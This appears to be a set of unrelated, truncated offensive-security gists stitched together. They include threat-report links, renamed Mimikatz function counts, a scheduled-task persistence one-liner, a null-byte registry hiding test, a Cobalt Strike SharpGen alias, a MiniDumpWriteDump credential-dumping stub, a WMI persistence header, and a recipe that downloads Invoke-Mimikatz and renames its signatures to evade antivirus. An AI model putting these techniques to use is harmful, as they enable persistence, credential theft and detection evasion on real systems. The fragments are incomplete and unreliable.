- Fireeye HammerToss PDF: https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
- 7 Years of Dukes: https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/
- RTM Banking malware: https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf
- Lowball Malware: https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html
- CloudAtlas malware: https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/
143 function Invoke-Mimidogz | |
140 function Invoke-Mimikatz | |
29 function Invoke-Mimi | |
10 function Chokorun | |
7 function Invoke-Ttest | |
7 function Invoke-Mimiwormz | |
7 function Invoke-Me | |
6 function Invoke-Mimiturtle | |
6 function Invoke-Mimimi | |
5 function output |
# Looks up the existing 'XblGameSaveTaskLogon' task, appends one more action (here: calc.exe)
# to its Actions list, and re-registers the task with the merged list via Set-ScheduledTask.
# Only -TaskPath/-TaskName/-Action are passed, so the task's trigger and principal are not
# redefined on this line — presumably they stay as already registered; confirm on the host.
# Defensive review: no new task is created, so compare each task's Actions against a
# known-good baseline instead of only looking for newly registered task names.
Get-ScheduledTask -TaskName 'XblGameSaveTaskLogon' | % { $_.Actions += New-ScheduledTaskAction -Execute 'calc.exe'; Set-ScheduledTask -TaskPath $_.TaskPath -TaskName $_.TaskName -Action $_.Actions } |
from Microsoft.Win32 import Registry | |
from time import sleep | |
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!') | |
rkey.Close() | |
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
values = rkey.GetValueNames() | |
print("We have {0} values.".format(str(len(values)))) | |
print("The value names returned are: {0}.".format(values[0])) | |
value = rkey.GetValue(u'\x00 this is a test') |
DisplayName Twitterhandle
----------- -------------
fr016 @fr0161
chgopsug @chgopsug
Kevin Bates @_bateskevin
Danny Maertens @maertend33
Julien Reisdorffer @JReisdorffer
Ben Reader @powers_hell
# Operator-specific absolute paths: the dotnet host, the SharpGen assembly and a scratch
# directory. $temppath is used by the sharpgen alias below to name the generated source
# and executable files; the other two are presumably consumed by the same alias — confirm
# in the full script.
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
# Registers the "sharpgen" beacon console command with its short description and synopsis text.
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
$Source = @" | |
using System; | |
using System.Runtime.InteropServices; | |
namespace ProcDump { | |
public static class DbgHelp { | |
[DllImport("Dbghelp.dll")] | |
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, IntPtr hFile, IntPtr DumpType, IntPtr ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); | |
} | |
} |
' | |
' SYNOPSIS: | |
' WMI Persistence method as originally presented by SEADADDY malware | |
' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
' and further documented by Matt Graeber. | |
' | |
' The scheduled command will be launched roughly 3 minutes after the system | |
' boots. Even if the command would spawn a window, it will not be visible, | |
' because the command is invoked by WmiPrvSE.exe, which runs in Session 0. | |
' |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
# AV Bypass to run Mimikatz | |
# From: https://www.blackhillsinfosec.com/?p=5555 | |
# Server side: | |
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 | |
sed -i -e 's/Invoke-Mimikatz/Invoke-Mimidogz/g' Invoke-Mimikatz.ps1 | |
sed -i -e '/<#/,/#>/c\\' Invoke-Mimikatz.ps1 | |
sed -i -e 's/^[[:space:]]*#.*$//g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/DumpCreds/DumpCred/g' Invoke-Mimikatz.ps1 | |
sed -i -e 's/ArgumentPtr/NotTodayPal/g' Invoke-Mimikatz.ps1 |